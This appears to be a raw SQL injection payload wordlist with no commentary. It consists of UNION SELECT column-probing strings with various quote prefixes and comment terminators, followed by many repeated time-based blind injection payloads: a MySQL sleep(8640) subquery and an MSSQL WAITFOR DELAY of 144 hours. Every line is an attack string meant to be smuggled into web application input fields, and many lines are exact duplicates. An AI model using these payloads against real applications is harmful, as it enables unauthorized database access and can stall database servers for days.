' UNION SELECT NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL/*
a" UNION SELECT NULL,NULL,NULL,NULL--
a" UNION SELECT NULL,NULL,NULL,NULL-- -;
a" UNION SELECT NULL,NULL,NULL,NULL-- -
a" UNION SELECT NULL,NULL,NULL,NULL#
a" UNION SELECT NULL,NULL,NULL,NULL;
a" UNION SELECT NULL,NULL,NULL,NULL;#
a" UNION SELECT NULL,NULL,NULL,NULL/*
a' UNION SELECT NULL,NULL,NULL,NULL--
a' UNION SELECT NULL,NULL,NULL,NULL-- -;
a' UNION SELECT NULL,NULL,NULL,NULL-- -
a' UNION SELECT NULL,NULL,NULL,NULL#
a' UNION SELECT NULL,NULL,NULL,NULL;
a' UNION SELECT NULL,NULL,NULL,NULL;#
a' UNION SELECT NULL,NULL,NULL,NULL/*
test UNION SELECT NULL,NULL,NULL,NULL--
test UNION SELECT NULL,NULL,NULL,NULL-- -;
test UNION SELECT NULL,NULL,NULL,NULL-- -
test UNION SELECT NULL,NULL,NULL,NULL#
test UNION SELECT NULL,NULL,NULL,NULL;
test UNION SELECT NULL,NULL,NULL,NULL;#
test UNION SELECT NULL,NULL,NULL,NULL/*
user" UNION SELECT NULL,NULL,NULL,NULL--
user" UNION SELECT NULL,NULL,NULL,NULL-- -;
user" UNION SELECT NULL,NULL,NULL,NULL-- -
user" UNION SELECT NULL,NULL,NULL,NULL#
user" UNION SELECT NULL,NULL,NULL,NULL;
user" UNION SELECT NULL,NULL,NULL,NULL;#
user" UNION SELECT NULL,NULL,NULL,NULL/*
user' UNION SELECT NULL,NULL,NULL,NULL--
user' UNION SELECT NULL,NULL,NULL,NULL-- -;
user' UNION SELECT NULL,NULL,NULL,NULL-- -
user' UNION SELECT NULL,NULL,NULL,NULL#
user' UNION SELECT NULL,NULL,NULL,NULL;
user' UNION SELECT NULL,NULL,NULL,NULL;#
user' UNION SELECT NULL,NULL,NULL,NULL/*
user UNION SELECT NULL,NULL,NULL,NULL--
user UNION SELECT NULL,NULL,NULL,NULL-- -;
user UNION SELECT NULL,NULL,NULL,NULL-- -
user UNION SELECT NULL,NULL,NULL,NULL#
user UNION SELECT NULL,NULL,NULL,NULL;
user UNION SELECT NULL,NULL,NULL,NULL;#
user UNION SELECT NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
a" UNION SELECT NULL,NULL,NULL,NULL,NULL--
a" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
a" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
a" UNION SELECT NULL,NULL,NULL,NULL,NULL#
a" UNION SELECT NULL,NULL,NULL,NULL,NULL;
a" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
a" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
a' UNION SELECT NULL,NULL,NULL,NULL,NULL--
a' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
a' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
a' UNION SELECT NULL,NULL,NULL,NULL,NULL#
a' UNION SELECT NULL,NULL,NULL,NULL,NULL;
a' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
a' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
test UNION SELECT NULL,NULL,NULL,NULL,NULL--
test UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
test UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
test UNION SELECT NULL,NULL,NULL,NULL,NULL#
test UNION SELECT NULL,NULL,NULL,NULL,NULL;
test UNION SELECT NULL,NULL,NULL,NULL,NULL;#
test UNION SELECT NULL,NULL,NULL,NULL,NULL/*
user" UNION SELECT NULL,NULL,NULL,NULL,NULL--
user" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
user" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
user" UNION SELECT NULL,NULL,NULL,NULL,NULL#
user" UNION SELECT NULL,NULL,NULL,NULL,NULL;
user" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
user" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
user' UNION SELECT NULL,NULL,NULL,NULL,NULL--
user' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
user' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
user' UNION SELECT NULL,NULL,NULL,NULL,NULL#
user' UNION SELECT NULL,NULL,NULL,NULL,NULL;
user' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
user' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
user UNION SELECT NULL,NULL,NULL,NULL,NULL--
user UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
user UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
user UNION SELECT NULL,NULL,NULL,NULL,NULL#
user UNION SELECT NULL,NULL,NULL,NULL,NULL;
user UNION SELECT NULL,NULL,NULL,NULL,NULL;#
user UNION SELECT NULL,NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
a" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
a" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
a" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
a" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
a" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
a" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
a" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
(select(*)from(select(sleep(8640)))shahmidoe)--
(select(*)from(select(sleep(8640)))shahmidoe)-- -;
(select(*)from(select(sleep(8640)))shahmidoe)-- -
(select(*)from(select(sleep(8640)))shahmidoe)#
(select(*)from(select(sleep(8640)))shahmidoe);
(select(*)from(select(sleep(8640)))shahmidoe);#
(select(*)from(select(sleep(8640)))shahmidoe)/*
(select(*)from(select(sleep(8640)))shahmidoe)--
(select(*)from(select(sleep(8640)))shahmidoe)-- -;
(select(*)from(select(sleep(8640)))shahmidoe)-- -
(select(*)from(select(sleep(8640)))shahmidoe)#
(select(*)from(select(sleep(8640)))shahmidoe);
(select(*)from(select(sleep(8640)))shahmidoe);#
(select(*)from(select(sleep(8640)))shahmidoe)/*
(select(*)from(select(sleep(8640)))shahmidoe)--
(select(*)from(select(sleep(8640)))shahmidoe)-- -;
(select(*)from(select(sleep(8640)))shahmidoe)-- -
(select(*)from(select(sleep(8640)))shahmidoe)#
(select(*)from(select(sleep(8640)))shahmidoe);
(select(*)from(select(sleep(8640)))shahmidoe);#
(select(*)from(select(sleep(8640)))shahmidoe)/*
(select(*)from(select(sleep(8640)))shahmidoe)--
(select(*)from(select(sleep(8640)))shahmidoe)-- -;
(select(*)from(select(sleep(8640)))shahmidoe)-- -
(select(*)from(select(sleep(8640)))shahmidoe)#
(select(*)from(select(sleep(8640)))shahmidoe);
(select(*)from(select(sleep(8640)))shahmidoe);#
(select(*)from(select(sleep(8640)))shahmidoe)/*
(select(*)from(select(sleep(8640)))shahmidoe)--
(select(*)from(select(sleep(8640)))shahmidoe)-- -;
(select(*)from(select(sleep(8640)))shahmidoe)-- -
(select(*)from(select(sleep(8640)))shahmidoe)#
(select(*)from(select(sleep(8640)))shahmidoe);
(select(*)from(select(sleep(8640)))shahmidoe);#
(select(*)from(select(sleep(8640)))shahmidoe)/*
(select(*)from(select(sleep(8640)))shahmidoe)--
(select(*)from(select(sleep(8640)))shahmidoe)-- -;
(select(*)from(select(sleep(8640)))shahmidoe)-- -
(select(*)from(select(sleep(8640)))shahmidoe)#
(select(*)from(select(sleep(8640)))shahmidoe);
(select(*)from(select(sleep(8640)))shahmidoe);#
(select(*)from(select(sleep(8640)))shahmidoe)/*
(select(*)from(select(sleep(8640)))shahmidoe)--
(select(*)from(select(sleep(8640)))shahmidoe)-- -;
(select(*)from(select(sleep(8640)))shahmidoe)-- -
(select(*)from(select(sleep(8640)))shahmidoe)#
(select(*)from(select(sleep(8640)))shahmidoe);
(select(*)from(select(sleep(8640)))shahmidoe);#
(select(*)from(select(sleep(8640)))shahmidoe)/*
(select(*)from(select(sleep(8640)))shahmidoe)--
(select(*)from(select(sleep(8640)))shahmidoe)-- -;
(select(*)from(select(sleep(8640)))shahmidoe)-- -
(select(*)from(select(sleep(8640)))shahmidoe)#
(select(*)from(select(sleep(8640)))shahmidoe);
(select(*)from(select(sleep(8640)))shahmidoe);#
(select(*)from(select(sleep(8640)))shahmidoe)/*
(select(*)from(select(sleep(8640)))shahmidoe)--
(select(*)from(select(sleep(8640)))shahmidoe)-- -;
(select(*)from(select(sleep(8640)))shahmidoe)-- -
(select(*)from(select(sleep(8640)))shahmidoe)#
(select(*)from(select(sleep(8640)))shahmidoe);
(select(*)from(select(sleep(8640)))shahmidoe);#
(select(*)from(select(sleep(8640)))shahmidoe)/*
6 days elapsed,;WAITFOR DELAY '144:00:00'--
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -;
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -
6 days elapsed,;WAITFOR DELAY '144:00:00'#
6 days elapsed,;WAITFOR DELAY '144:00:00';
6 days elapsed,;WAITFOR DELAY '144:00:00';#
6 days elapsed,;WAITFOR DELAY '144:00:00'/*
6 days elapsed,;WAITFOR DELAY '144:00:00'--
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -;
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -
6 days elapsed,;WAITFOR DELAY '144:00:00'#
6 days elapsed,;WAITFOR DELAY '144:00:00';
6 days elapsed,;WAITFOR DELAY '144:00:00';#
6 days elapsed,;WAITFOR DELAY '144:00:00'/*
6 days elapsed,;WAITFOR DELAY '144:00:00'--
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -;
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -
6 days elapsed,;WAITFOR DELAY '144:00:00'#
6 days elapsed,;WAITFOR DELAY '144:00:00';
6 days elapsed,;WAITFOR DELAY '144:00:00';#
6 days elapsed,;WAITFOR DELAY '144:00:00'/*
6 days elapsed,;WAITFOR DELAY '144:00:00'--
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -;
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -
6 days elapsed,;WAITFOR DELAY '144:00:00'#
6 days elapsed,;WAITFOR DELAY '144:00:00';
6 days elapsed,;WAITFOR DELAY '144:00:00';#
6 days elapsed,;WAITFOR DELAY '144:00:00'/*
6 days elapsed,;WAITFOR DELAY '144:00:00'--
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -;
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -
6 days elapsed,;WAITFOR DELAY '144:00:00'#
6 days elapsed,;WAITFOR DELAY '144:00:00';
6 days elapsed,;WAITFOR DELAY '144:00:00';#
6 days elapsed,;WAITFOR DELAY '144:00:00'/*
6 days elapsed,;WAITFOR DELAY '144:00:00'--
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -;
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -
6 days elapsed,;WAITFOR DELAY '144:00:00'#
6 days elapsed,;WAITFOR DELAY '144:00:00';
6 days elapsed,;WAITFOR DELAY '144:00:00';#
6 days elapsed,;WAITFOR DELAY '144:00:00'/*
6 days elapsed,;WAITFOR DELAY '144:00:00'--
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -;
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -
6 days elapsed,;WAITFOR DELAY '144:00:00'#
6 days elapsed,;WAITFOR DELAY '144:00:00';
6 days elapsed,;WAITFOR DELAY '144:00:00';#
6 days elapsed,;WAITFOR DELAY '144:00:00'/*
6 days elapsed,;WAITFOR DELAY '144:00:00'--
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -;
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -
6 days elapsed,;WAITFOR DELAY '144:00:00'#
6 days elapsed,;WAITFOR DELAY '144:00:00';
6 days elapsed,;WAITFOR DELAY '144:00:00';#
6 days elapsed,;WAITFOR DELAY '144:00:00'/*
6 days elapsed,;WAITFOR DELAY '144:00:00'--
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -;
6 days elapsed,;WAITFOR DELAY '144:00:00'-- -
6 days elapsed,;WAITFOR DELAY '144:00:00'#
6 days elapsed,;WAITFOR DELAY '144:00:00';
6 days elapsed,;WAITFOR DELAY '144:00:00';#
6 days elapsed,;WAITFOR DELAY '144:00:00'/*
